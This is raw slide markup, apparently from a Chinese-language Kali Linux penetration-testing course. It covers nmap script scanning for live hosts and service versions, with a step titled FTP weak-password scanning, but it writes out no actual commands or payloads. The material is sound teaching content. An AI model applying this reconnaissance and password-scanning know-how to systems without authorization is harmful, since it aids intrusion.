            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="2799080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086569"/>
              <a:ext cx="4902200" cy="2584450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>在未知目标主机的服务开放情况时，可以使用信息搜集工具nmap，配合工具中现有的脚本对目标主机的开放端口进行脚本扫描，得到当前网络中的存活主机、目标主机的系统版本与服务版本，方便下一步对服务脆弱性的探测和服务漏洞的检测。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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11" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835025" y="1952625"/>
            <a:ext cx="10624820" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>牢记</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>FTP弱密码扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
